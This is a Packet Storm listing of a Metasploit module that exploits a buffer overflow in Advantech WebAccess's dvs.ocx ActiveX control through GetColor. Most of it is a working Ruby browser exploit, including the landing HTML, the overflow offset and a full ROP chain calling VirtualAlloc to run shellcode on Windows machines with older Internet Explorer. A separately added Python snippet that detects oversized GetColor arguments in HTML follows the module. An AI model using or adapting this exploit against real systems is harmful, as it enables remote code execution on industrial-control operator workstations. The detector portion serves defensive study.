Advantech WebAccess dvs.ocx GetColor Buffer Overflow

Published 24 Sep 2014. Reported by juan vazquez. Type: packetstorm (source: packetstormsecurity.com)

This module exploits a buffer overflow vulnerability in Advantech WebAccess. The vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to sprintf can be reached with user-controlled data through the GetColor function. This module has been tested successfully on Windows XP SP3 with IE6 and on Windows 7 SP1 with IE8 and IE9.

Code

```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow',
      'Description' => %q{
        This module exploits a buffer overflow vulnerability in Advantech WebAccess. The
        vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to
        sprintf can be reached with user controlled data through the GetColor function.
        This module has been tested successfully on Windows XP SP3 with IE6 and Windows
        7 SP1 with IE8 and IE 9.
      },
      'License'     => MSF_LICENSE,
      'Author'      =>
        [
          'Unknown',      # Vulnerability discovery
          'juan vazquez'  # Metasploit module
        ],
      'References'  =>
        [
          ['CVE', '2014-2364'],
          ['ZDI', '14-255'],
          ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02']
        ],
      'DefaultOptions' =>
        {
          'Retries' => false,
          'InitialAutoRunScript' => 'migrate -f'
        },
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :os_name => Msf::OperatingSystems::WINDOWS,
          :ua_name => /MSIE/i,
          :ua_ver  => lambda { |ver| Gem::Version.new(ver) < Gem::Version.new('10') },
          :clsid   => "{5CE92A27-9F6A-11D2-9D3D-000001155641}",
          :method  => "GetColor"
        },
      'Payload' =>
        {
          'Space'       => 1024,
          'DisableNops' => true,
          'BadChars'    => "\x00\x0a\x0d\x5c",
          # Patch the stack to execute the decoder...
          'PrependEncoder' => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100
          # Fix the stack again, this time better :), before the payload
          # is executed.
          'Prepend' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
                       "\x83\xC0\x08" +             # add eax, byte 8
                       "\x8b\x20" +                 # mov esp, [eax]
                       "\x81\xC4\x30\xF8\xFF\xFF"   # add esp, -2000
        },
      'Platform' => 'win',
      'Arch'     => ARCH_X86,
      'Targets'  =>
        [
          [ 'Automatic', { } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Jul 17 2014'))
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Requested: #{request.uri}")

    content = <<-EOS
<html>
<head>
<meta http-equiv="cache-control" content="max-age=0" />
<meta http-equiv="cache-control" content="no-cache" />
<meta http-equiv="expires" content="0" />
<meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT" />
<meta http-equiv="pragma" content="no-cache" />
</head>
<body>
<object classid='clsid:5CE92A27-9F6A-11D2-9D3D-000001155641' id='test' /></object>
<script language='javascript'>
test.GetColor("#{rop_payload(get_payload(cli, target_info))}", 0);
</script>
</body>
</html>
    EOS

    print_status("Sending #{self.name}")
    send_response_html(cli, content, {'Pragma' => 'no-cache'})
  end

  # Uses gadgets from ijl11.dll 1.1.2.16
  def rop_payload(code)
    xpl = rand_text_alphanumeric(61)   # offset
    xpl << [0x60014185].pack("V")      # RET
    xpl << rand_text_alphanumeric(8)

    # EBX = dwSize (0x40)
    xpl << [0x60012288].pack("V")      # POP ECX # RETN
    xpl << [0xffffffff].pack("V")      # ecx value
    xpl << [0x6002157e].pack("V")      # POP EAX # RETN
    xpl << [0x9ffdafc9].pack("V")      # eax value
    xpl << [0x60022b97].pack("V")      # ADC EAX,60025078 # RETN
    xpl << [0x60024ea4].pack("V")      # MUL EAX,ECX # RETN 0x10
    xpl << [0x60018084].pack("V")      # POP EBP # RETN
    xpl << rand_text_alphanumeric(4)   # padding
    xpl << rand_text_alphanumeric(4)   # padding
    xpl << rand_text_alphanumeric(4)   # padding
    xpl << rand_text_alphanumeric(4)   # padding
    xpl << [0x60029f6c].pack("V")      # .data ijl11.dll
    xpl << [0x60012288].pack("V")      # POP ECX # RETN
    xpl << [0x60023588].pack("V")      # ECX => (&POP EBX # RETN)
    xpl << [0x6001f1c8].pack("V")      # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret
    # EDX = flAllocationType (0x1000)
    xpl << [0x60012288].pack("V")      # POP ECX # RETN
    xpl << [0xffffffff].pack("V")      # ecx value
    xpl << [0x6002157e].pack("V")      # POP EAX # RETN
    xpl << [0x9ffdbf89].pack("V")      # eax value
    xpl << [0x60022b97].pack("V")      # ADC EAX,60025078 # RETN
    xpl << [0x60024ea4].pack("V")      # MUL EAX,ECX # RETN 0x10
    # ECX = flProtect (0x40)
    xpl << [0x6002157e].pack("V")      # POP EAX # RETN
    xpl << rand_text_alphanumeric(4)   # padding
    xpl << rand_text_alphanumeric(4)   # padding
    xpl << rand_text_alphanumeric(4)   # padding
    xpl << rand_text_alphanumeric(4)   # padding
    xpl << [0x60029f6c].pack("V")      # .data ijl11.dll
    xpl << [0x60012288].pack("V")      # POP ECX # RETN
    xpl << [0xffffffff].pack("V")      # ecx value
    0x41.times do
      xpl << [0x6001b8ec].pack("V")    # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN
    end
    # EAX = ptr to &VirtualAlloc()
    xpl << [0x6001db7e].pack("V")      # POP EAX # RETN [ijl11.dll]
    xpl << [0x600250c8].pack("V")      # ptr to &VirtualAlloc() [IAT ijl11.dll]
    # EBP = POP (skip 4 bytes)
    xpl << [0x6002054b].pack("V")      # POP EBP # RETN
    xpl << [0x6002054b].pack("V")      # ptr to &(# pop ebp # retn)
    # ESI = ptr to JMP [EAX]
    xpl << [0x600181cc].pack("V")      # POP ESI # RETN
    xpl << [0x6002176e].pack("V")      # ptr to &(# jmp[eax])
    # EDI = ROP NOP (RETN)
    xpl << [0x60021ad1].pack("V")      # POP EDI # RETN
    xpl << [0x60021ad2].pack("V")      # ptr to &(retn)
    # ESP = lpAddress (automatic)
    # PUSHAD # RETN
    xpl << [0x60018399].pack("V")      # PUSHAD # RETN
    xpl << [0x6001c5cd].pack("V")      # ptr to &(# push esp # retn)
    xpl << code

    # Escape backslashes first, so the escaping backslashes added for the quotes
    # below are not doubled afterwards. The block form is used because gsub
    # treats "\\\\" in a replacement string as a single literal backslash.
    xpl.gsub!("\\") { "\\\\" }         # Escape back slash, to avoid javascript escaping
    xpl.gsub!("\"", "\\\"")            # Escape double quote, to not break javascript string

    xpl
  end

end
```
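As a defensive complement, added here and not part of the original module or of Advantech's or Metasploit's code: a small detector that scans an HTML response for pages that instantiate the dvs.ocx control by its CLSID and pass an oversized string literal to GetColor, the pattern the module's landing page produces. The CLSID and method name come from the page; the 32-character threshold, the sample pages and the function names are assumptions made for this example.

```python
import re

# CLSID of the dvs.ocx ActiveX control targeted by the module (from the page).
DVS_CLSID = "5CE92A27-9F6A-11D2-9D3D-000001155641"

# Any string literal longer than this passed to GetColor is reported. A real
# colour value is short; the module needs 61 bytes of padding before the
# overwritten return address alone. Threshold is an assumption for this example.
MAX_COLOR_ARG = 32

# <object ... classid='clsid:<DVS_CLSID>' ... id='<name>' ...>
_OBJECT_RE = re.compile(
    r"<object[^>]*\bclassid\s*=\s*['\"]clsid:" + re.escape(DVS_CLSID)
    + r"['\"][^>]*\bid\s*=\s*['\"](?P<id>[^'\"]+)['\"]",
    re.IGNORECASE,
)


def find_getcolor_abuse(html: str) -> list[dict]:
    """Return one finding per GetColor call on a dvs.ocx object whose first
    argument is a quoted string literal longer than MAX_COLOR_ARG characters.
    Backslash-escaped quotes inside the literal (as the module emits) are
    treated as part of the string rather than as its end."""
    findings = []
    for m in _OBJECT_RE.finditer(html):
        obj_id = m.group("id")
        call_re = re.compile(
            re.escape(obj_id)
            + r"\s*\.\s*GetColor\s*\(\s*(?P<q>['\"])(?P<arg>(?:\\.|(?!(?P=q)).)*)(?P=q)",
            re.IGNORECASE | re.DOTALL,
        )
        for c in call_re.finditer(html):
            arg_len = len(c.group("arg"))
            if arg_len > MAX_COLOR_ARG:
                findings.append({"object_id": obj_id, "arg_length": arg_len})
    return findings


# Constructed sample pages mirroring the structure of the module's HTML.
_OBJ = "<object classid='clsid:" + DVS_CLSID + "' id='test' /></object>\n"
BENIGN_HTML = "<html><body>\n" + _OBJ + "<script>test.GetColor(\"#FF0000\", 0);</script></body></html>"
SUSPICIOUS_HTML = ("<html><body>\n" + _OBJ + "<script language='javascript'>\n"
                   "test.GetColor(\"" + "A" * 61 + "B" * 200 + "\", 0);\n</script></body></html>")
# Literal containing an escaped double quote, which must not end the match early.
ESCAPED_QUOTE_HTML = ("<html><body>\n" + _OBJ + "<script>\n"
                      "test.GetColor(\"" + "A" * 40 + "\\\"" + "B" * 5 + "\", 0);\n</script></body></html>")

if __name__ == "__main__":
    for name, page in [("benign", BENIGN_HTML), ("suspicious", SUSPICIOUS_HTML)]:
        print(name, find_getcolor_abuse(page))
```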
